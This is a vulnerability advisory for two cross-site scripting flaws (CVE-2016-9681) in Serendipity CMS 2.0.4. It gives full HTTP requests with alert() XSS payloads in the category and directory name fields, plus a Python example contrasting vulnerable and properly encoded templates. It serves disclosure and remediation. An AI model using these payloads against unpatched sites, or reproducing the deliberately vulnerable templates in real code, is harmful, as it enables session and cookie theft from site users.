[CVE-2016-9681] Serendipity CMS – XSS Vulnerability in Version 2.0.4
Product Information:
Software: Serendipity CMS
Tested Version: 2.0.4, released 26.09.2016
Vulnerability Type: Cross-Site Scripting (CWE-79)
Download link: https://github.com/s9y/Serendipity/releases/tag/2.0.4
Description: Serendipity is a PHP-powered weblog engine that gives the user an easy way to maintain a blog. While the default package is designed for the casual blogger, Serendipity offers an expandable framework with the power for professional applications. (copied from https://docs.s9y.org/)
Vulnerability description:
There are two XSS vulnerabilities in Serendipity CMS.
1) XSS in the creation of a new category page
2) XSS in the creation of the base directory page
Category Page
When an authenticated user of Serendipity CMS is creating a new category, the following POST request is sent to the server:
POST /s9y/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/s9y/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new
Cookie: serendipity[old_session]=u4l95320lc39fen9n2f8o04jm5; serendipity[userDefLang]=en; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.name; serendipity[sortorder_ordermode]=DESC; serendipity[only_path]=; serendipity[only_filename]=; serendipity[toggle_extended]=true; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; accessibletab_mediaupload_tabs_active=1; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=400; serendipity[imgWidth]=480; serendipity[imgHeight]=480; serendipity[imgID]=5; serendipity[baseURL]=http://127.0.0.1/s9y/; serendipity[indexFile]=index.php; serendipity[imgName]=/s9y/uploads/img_src1_onerroralert1223e.png; serendipity[thumbName]=/s9y/uploads/img_src1_onerroralert1223e.serendipityThumb.png; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; serendipity[author_token]=9e3d614472aa8c3659f653b47fd193a31777f150; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 380
serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab&serendipity[cat][name]=<script>alert(0)</script>&serendipity[cat][description]=&serendipity[cat][parent_cat]=0&serendipity[cat][hide_sub]=0&serendipity[cat][read_authors][]=0&serendipity[cat][write_authors][]=0&serendipity[cat][icon]=&SAVE=Create
The parameter serendipity[cat][name] is vulnerable to XSS.
The payload is not executed in the response to this request; it is executed later, whenever an authenticated user creates another category.
Base Directory Page
When an authenticated user of Serendipity CMS is creating a new base directory, the following POST request is sent to the server:
POST /s9y/serendipity_admin.php?serendipity[step]=directoryDoCreate&serendipity[adminModule]=images&serendipity[adminAction]=directoryDoCreate HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/s9y/serendipity_admin.php?serendipity[adminModule]=images&serendipity[adminAction]=directoryCreate
Cookie: serendipity[old_session]=u4l95320lc39fen9n2f8o04jm5; serendipity[userDefLang]=en; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.name; serendipity[sortorder_ordermode]=DESC; serendipity[only_path]=; serendipity[only_filename]=; serendipity[toggle_extended]=true; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; accessibletab_mediaupload_tabs_active=1; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=400; serendipity[imgWidth]=480; serendipity[imgHeight]=480; serendipity[imgID]=5; serendipity[baseURL]=http://127.0.0.1/s9y/; serendipity[indexFile]=index.php; serendipity[imgName]=/s9y/uploads/img_src1_onerroralert1223e.png; serendipity[thumbName]=/s9y/uploads/img_src1_onerroralert1223e.serendipityThumb.png; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; serendipity[author_token]=31fd07e44a90a6bd7a8a03010660df86790eb948; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab&serendipity[name]=</script><svg onload=alert(0)>&serendipity[parent]=&SAVE=Create directory
The parameter serendipity[name] is vulnerable to reflected XSS.
The payload is executed immediately, in the response to the request that creates the new directory, and only that once.
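The two payloads above target different output contexts: the category name lands in plain HTML, while the directory name starts with </script>, which only makes sense if the value is echoed inside an inline script block. The following is an added example (not Serendipity's code) using hypothetical templates to show why each context needs its own output encoding; the start_tags helper approximates what a browser's parser would see, and the payloads are the ones from the advisory.

```python
import html
import json
from html.parser import HTMLParser

# Payloads taken from the two requests in the advisory.
CATEGORY_NAME = "<script>alert(0)</script>"
DIRECTORY_NAME = "</script><svg onload=alert(0)>"


class TagCollector(HTMLParser):
    """Records every start tag an HTML parser would see in the markup."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(markup):
    p = TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


# --- HTML body context: the stored category name (hypothetical template) ---
def category_option_vulnerable(name):
    # Name interpolated raw into the parent-category list.
    return '<option value="1">%s</option>' % name


def category_option_fixed(name):
    # Entity-encode for an HTML text/attribute context.
    return '<option value="1">%s</option>' % html.escape(name, quote=True)


# --- inline JavaScript context: the reflected directory name (hypothetical) ---
def directory_script_vulnerable(name):
    # Name echoed into a JS string literal; a literal </script> in the data
    # terminates the script block early, and what follows is parsed as HTML.
    return '<script>var newDir = "%s";</script>' % name


def directory_script_fixed(name):
    # JSON-encode for the JS string context and replace angle brackets with
    # \u escapes so the byte sequence </script> can never occur in the block.
    enc = json.dumps(name).replace("<", "\\u003c").replace(">", "\\u003e")
    return "<script>var newDir = %s;</script>" % enc
```

html.escape alone would not be enough for the script context (the JS string would then contain literal entities), which is why the two sinks take different encoders.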
Impact:
An attacker is able to inject malicious scripts into an otherwise benign and trusted website. The malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site, and it can rewrite the contents of the HTML page. Exploitation is further simplified by tools such as BeEF (The Browser Exploitation Framework).
Solution:
Update to the latest version, which is 2.0.5, see https://blog.s9y.org/archives/271-Serendipity-2.0.5-and-2.1-beta3-released.html
Timeline:
Vulnerability found: 25.11.2016
Vendor informed: 26.11.2016
Response by vendor: 28.11.2016
Fix by vendor: 28.11.2016
Public Advisory: 03.12.2016
Reference:
https://github.com/s9y/Serendipity/commit/e2a665e13b7de82a71c9bbb77575d15131b722be